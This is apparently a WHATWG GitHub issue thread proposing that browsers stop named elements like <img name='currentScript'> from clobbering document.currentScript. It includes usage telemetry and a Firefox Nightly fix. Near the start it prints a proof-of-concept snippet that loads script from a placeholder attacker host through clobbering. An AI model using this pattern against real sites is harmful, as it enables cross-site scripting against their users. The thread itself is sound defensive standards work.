html
html copied to clipboard
Prevent currentScript from being overridden on document via name=''
What is the issue with the HTML Standard?
It has been reported that an attacker that has DOM clobbering powers (weak), can potentially escalate it to XSS attack (stronger).
Several public CVEs have been reported, e.g.
https://vulert.com/vuln-db/CVE-2024-45389 https://github.com/advisories/GHSA-gcx4-mw62-g8wm https://nvd.nist.gov/vuln/detail/CVE-2024-45812 https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986
These all revolve around the fact that
<html><body>
<img name='currentScript' src='http://bad.attacker.site.com/foo.js'>
<script>
var script = document.createElement('script');
var scriptDir = document.currentScript.src.substr(0, document.currentScript.src.lastIndexOf('/'));
script.src = `${scriptDir}/sibling.js`;
</script></body></html>
That is, if attacker has the power to inject a DOM element with name='currentScript' (like add an image in a forum in an unsafely implemented manner), and if the site then uses document.currentScript.src to infer what the path to the current script is, to load another script relative to it, an attacker has the capability to elevate their DOM clobber into a XSS opportunity.
I raised this in https://github.com/whatwg/dom/issues/1315 where it was closed as duplicate of https://github.com/whatwg/html/issues/2212.
The ticket https://github.com/whatwg/html/issues/2212 discussed a general opt-out solution, though it feels that a) a solution to this security aspect should not be opt-out, and b) dealing with the specific pattern of document.currentScript alone would be worth it, as that would plug that whole class of CVEs linked above from being able to occur.
Progress in https://github.com/whatwg/html/issues/2212 has been slow due to concerns of site breakage. I think it would be safe to argue that preventing <img name='currentScript' src='http://bad.attacker.site.com/foo.js'> from overwriting document.currentScript, i.e. handling the overwrite of name='currentScript' alone should not have these backwards compatibility concerns of site breakage, and would be possible to be undertaken separately from https://github.com/whatwg/html/issues/2212, which is currently in the progress of acquiring user statistics?
Reading the linked CVEs, it looks like that would cover all the CVEs above, and stop any future CVEs from this category from being possible. It would also prevent weird interactions in downstream libraries, like https://github.com/emscripten-core/emscripten/pull/22688, from needing to take place.
Would it be ok to blacklist name='currentScript' on its own from replacing document.currentScript? What do you think?
currentScript currently only works for classic scripts (i.e., not for module scripts) and only as long as they are found in the document tree (i.e., not when they are in a shadow tree).
While I suppose we could add a special case for it in Document object's named getter, it's not really an API that universal scripts ought to be using anyway. I guess I wouldn't oppose some kind of push for this, but it's not clear to me it's worth the effort.
document.currentScript presents in the outputs of widely used bundle tools like: webpack / rollup / vite / rspack / tsup / modern.js / umi, and wasm compiling and packing tools like emscripten / wasm-bindgen. I believe many can benefit if this is prevented from the source.
it's not really an API that universal scripts ought to be using anyway
we use it a lot in PyScript, as scripts there (the only valid data node we could use 'cause Custom Elements won't work the same) might need it, so we need to grab it and forward it to the underlying WASM interpreter.
All I am saying is that use cases for it are more common than you think (or measure, as I think you measure only JS code and not WASM related code too).
on a side note, we also run WASM in workers where document makes no sense (we provide it) and currentScript makes even less sense ... so maybe there's something to think about in the emscripten and wasm-bindgen side of affairs, happy to help there if needed.
it's not really an API that universal scripts ought to be using anyway
Looking at MDN: document.currentScript there are no markings of the API being deprecated or obsoleted. This comment is the first I hear about this sentiment. If using document.currentScript is outdated, there is no way today for developers to discover that they should no longer be using it. Especially if we are calling it outdated on grounds of potential security problems, such a conclusion should be widely publicized in the spec and/or MDN as a deprecation warning.
Also, using modules is not a drop-in replacement to many projects, but can require extensive code refactoring - so getting developers to migrate is not a quick feat.
it's not clear to me it's worth the effort
In the infosec community, it looks like publishing CVEs based on this <img name='currentScript'> privilege escalation is fair game, and based on the closing notes in this comment ("while checking [CVE] alerts across my projects"), I get an impression that automated JS code security scanners flag uses of document.currentScript.src because of this DOM clobbering pattern. It was clearly worth to them, and I do think that the common "zero-value CVE reports" argument does not apply here. (the behavior was highly surprising when I first read about this)
In that light, I think it would be worthwhile for WhatWG to tend to this, rather than leaving it to all site developers and the above listed middleware vendors to individually learn about and argue if it's a legitimate thing or not. The downsides seem practically nonexistent?
I'm not opposed to someone driving this. https://whatwg.org/working-mode#changes describes the rough process. If there is someone willing to take this on (and this can be literally anyone, including everyone who participated in this thread thus far; the WHATWG community consists of everyone who participates in the development of its standards after all) I suppose we could label this issue agenda+ to gauge implementer interest.
@whatwg/documentation perhaps it's worthwhile documenting that currentScript also does not work inside of shadow trees. And that it has generally fallen out of favor as per the note in the HTML Standard and https://github.com/whatwg/html/issues/1013.
If there is someone willing to take this on I suppose we could label this issue agenda+ to gauge implementer interest.
it's a security concern and a source of doom for the current state of the modern Web so I hope someone will try to fix it sooner than later.
I have a little bit of experience for creating WPT tests from the interaction we had before. To get going, I added a WPT test at https://github.com/web-platform-tests/wpt/pull/48536 . Of course to be merged only after implementers agree.
I tried to search where in the HTML spec the connection of DOM element name='foo' -> document.foo is made. I found only this: https://html.spec.whatwg.org/multipage/form-control-infrastructure.html#naming-form-controls:-the-name-attribute
though that relates to forms, and does not mention the document object.
Should the HTML spec acquire some kind of wording about this somewhere?
Filed implementation bugs at
- Chrome: https://issues.chromium.org/issues/372269621
- Firefox: https://bugzilla.mozilla.org/show_bug.cgi?id=1923580
- Safari: https://bugs.webkit.org/show_bug.cgi?id=281129
Thanks @juj for taking this on! The named getter algorithm for Document objects is defined here (getter object (DOMString name); is the relevant bit in IDL): https://html.spec.whatwg.org/multipage/dom.html#dom-document-nameditem
Blocklisting only currentScript name would help with this one particular case. But if sites let one to include unsanitized html, one could still override many other features on document, and thus break the page. This is a well known, old issue, and I'd expect sites to sanitize the included html.
But it would be great if this could be fixed in some generic way. I think we need first data about how much sites rely on https://html.spec.whatwg.org/multipage/dom.html#dom-document-nameditem Or maybe https://chromestatus.com/metrics/feature/timeline/popularity/4872 is about that? That seems quite low (There is also https://chromestatus.com/metrics/feature/timeline/popularity/4873) One problem changing the current setup is that if one adds new properties to Document, those might break existing sites.
Blocklisting only currentScript name would help with this one particular case.
Yes, that is right. Originally I too asked "let's fix all the cases" in https://github.com/whatwg/dom/issues/1315, but @annevk pointed out such a request was duplicate of https://github.com/whatwg/html/issues/2212 , which a) has been open since 2016 with no urgency, b) has a concern of breaking compatibility with existing sites, and c) was raised with no knowledge of being a security related request.
I'd expect sites to sanitize the included html.
Well, yes, after I saw this behavior: me too. I've been developing HTML/JS for well more than a decade and only learned about this behavior this week. When I did, I also expected that browsers would have sane behavior out of the box, i.e. that they would not allow document.currentScript to be overridden like this; but expecting others to do have done the sane thing doesn't always work out.
Given that the CVEs keep on coming, it does not seem that asking developers to sanitize would be the best approach (there will always be some who fail to do it, just like browser vendors have failed here), since it means that every developer has to learn about this issue independently, making it harder to write safe code out of the box.
This is a well known, old issue
I think this makes the problem more pertinent to solve, instead of diminishing/dismissing the trouble. Enough is enough?
it would be great if this could be fixed in some generic way
When I look at the CVEs, they all hinge on this one pattern that document.currentScript.src happens to collide with the .src property when a <img name='currentScript src='...'> is added. So in order to mute the CVEs from being possible, it is enough to get this document.currentScript hole plugged.
one could still override many other features on document, and thus break the page.
That is correct. In https://github.com/emscripten-core/emscripten/pull/22688#issuecomment-2399238660 I examined all the various ways that Emscripten content for example could be broken by using other names. But when looking at all the other names, there does not seem to exist a good way to escalate attack vectors. That is, the DOM clobering attack privilege fizzles to a Denial of Service attack, which is arguably a lesser problem than a XSS scripting attack, which all seems to revolve around document.currentScript.src. So I think tending to this one property as a special case does have value, and it can avoid the statistics gathering problem of https://github.com/whatwg/html/issues/2212.
I think it's worth investigating if it's possible to change this so that standard properties on document don't get shadowed.
To that end I queried httparchive to see which pages trigger the DOMClobberedShadowedDocumentPropertyAccessed use counter in Chrome, and then parsed those pages to find which properties used in the relevant elements' name and id attributes.
Findings:
There are 197 matching pages in the httparchive dataset (total number of pages is 12,098,307).
The name/id values and the number of pages with that value:
| Name/ID | Page Count |
|---|---|
| hidden | 38 |
| body | 29 |
| cookie | 26 |
| title | 25 |
| head | 5 |
| links | 5 |
| domain | 5 |
| images | 4 |
| all | 2 |
| forms | 1 |
See https://github.com/zcorpan/document-clobbering-props for the methodology (I used chatgpt to help write the scripts) and https://github.com/zcorpan/document-clobbering-props/blob/main/results_categorized.csv for further compat analysis of individual pages. For example, for pages that have <form name=cookie>, do they really expect document.cookie to return the form element?
Today I analyzed the affected pages found in httparchive (that hit the relevant chrome use counter). See https://docs.google.com/spreadsheets/d/1ATQUNv8_2B3S69zSfNWLcz44G-vY1rJ1wKIYKBJ0nBQ/edit?usp=sharing
Summary: Most pages expect non-clobbering (50 pages) or are not affected (85 pages), 5 pages rely on clobbering (or both rely on clobbering and elsewhere expect non-clobbering). Changing this for all standard properties on document would break a few pages but fix an order of magnitude more pages to match expectations.
Details below...
Pages expecting non-clobbering
- hidden
- 10 pages use
document.hiddenfor the visibility API, but also have aniframeorformwithname=hidden.
- 10 pages use
- body
- 26 pages use
document.bodyexpecting abodyelement but also have aniframewithname=body
- 26 pages use
- title
- 6 pages use
document.titleexpecting the page title but also have some element withname=title
- 6 pages use
- head
- 5 pages with
document.headexpect to get theheadelement but also have aformorimgelement withname=head
- 5 pages with
- all
- 2 pages use
document.allfor browser detection (modern browsers make it look likeundefined), butname=allreverses the result.
- 2 pages use
- forms
- 1 page uses
document.forms[0]expecting the first form in the forms collection, but hasname=formson aform(so aninputelement is returned instead).
- 1 page uses
Pages relying on clobbering
- cookie
- 2 pages use
document.cookie.submit().
- 2 pages use
- title
- 1 page uses
document.title.src=TopImg()
- 1 page uses
- links
- 2 pages for accessing an
imgor aform, respectively
- 2 pages for accessing an
N/A pages with notes
- cookie
- 23 pages have
<form name=cookie>but only load the script withdocument.cookieafter accepting cookies, at which point theformis gone, so are technically not affected by the clobbering.
- 23 pages have
5 pages out of 12,098,307 is ~0.00004%.
we cannot analyze this from static content and like I've said already in here https://github.com/whatwg/html/issues/10687#issuecomment-2399959583 we use this a lot when our own script lazy-loads foreign WASM based interpreters where the document.currentScript on bootstrap needs to be patched at runtime.
If we cannot temporarily override the current reference this will be a breaking change for our project and our users + you won't likely find PyScript .com apps in that analysis + it's entirely runtime behavior, not something you'll find within the HTML or within the JS because it's Python driven (in our case).
Reading again the OP, it's possible to grab the current script via querySelector too, analyze its content and/or src and create a sibling, meaning this won't likely fix the evil attack issue, it just makes it slightly harder but again, if we cna still temporarily patch document.currentScript then we're good, otherwise please consider projects trusting and using this property as it is since long time ago, thank you.
@WebReflection document.currentScript will continue to work. What will stop working is making <img name=currentScript> make document.currentScript return the img element instead of the current script.
I assume you're not relying on the latter?
@zcorpan correct, we don't want that to happen neither, so apologies but this (very old topic) just landed again and I wanted to be sure it wouldn't break our own expectations and that seems to be the case, it actually makes our own expectations more reliable, once fixed, so ... thank you.
I added some telemetry to Firefox 140, the following results are for Beta however. I am going to update this with the release numbers in a week or so. Overall the numbers are extremely low. There are some caveats though: We only count properties that WebIDL defines on document (currently excluding event handler content attributes) and I seemingly forgot to include properties on Object.prototype.
| property | # pageloads |
|---|---|
| hidden | 1,131 |
| body | 669 |
| links | 236 |
| all | 150 |
| head | 61 |
| forms | 15 |
| cookie | 14 |
| title | 9 |
| domain | 7 |
| scripts | 3 |
| dir | 2 |
| children | 1 |
For specification purposes, does it make sense to use a fixed list of standard properties that we don't allow being clobbered?
Ideally we would prevent clobbering of all standard properties in the prototype chain. But we can start with a fixed list if that is what we have data for and want to move forward with for now.
Here are the results for Firefox release.
| property | # pageloads |
|---|---|
| hidden | 437,947 |
| body | 210,672 |
| links | 91,266 |
| head | 33,237 |
| forms | 20,745 |
| title | 14,472 |
| all | 9,494 |
| cookie | 7,091 |
| scripts | 1,483 |
| domain | 1,072 |
| images | 857 |
| timeline | 654 |
| dir | 547 |
| referrer | 71 |
| URL | 58 |
| plugins | 36 |
| fullscreen | 33 |
| fonts | 26 |
| implementation | 22 |
| defaultView | 6 |
| children | 6 |
| contentType | 3 |
| anchors | 1 |
| currentScript | 1 |
| applets | 1 |
I find it very curious that according to this data DOM clobbering attacks using currentScript basically don't exist in the real world. These numbers might look big, but we have overall pageloads in the order of billions.
I think I am going to try and block clobbering for all WebIDL properties in Firefox Nightly. (And start collecting data on Object.prototype properties)
The latest Firefox Nightly has an implementation of this, thanks to @evilpie. currentScript seems to be particularly well-suited for removal, according to our usage telemetry. https://bugzilla.mozilla.org/show_bug.cgi?id=1976243
@mozfreddyb The change in Nightly is blocking shadowing of all properties, right? Not only currentScript?
@mozfreddyb The change in Nightly is blocking shadowing of all properties, right? Not only
currentScript?
This is basically correct. For now, I basically just decided to block the clobbering of everything declared as attribute in WebIDL. So title (and currentScript etc.), but not createElement(). I did this mostly out of memory/speed concerns, while this is still an experiment. I suspect methods are less useful as a target for DOM clobbering, but I am not opposed to blocking all properties just for consistency anyway.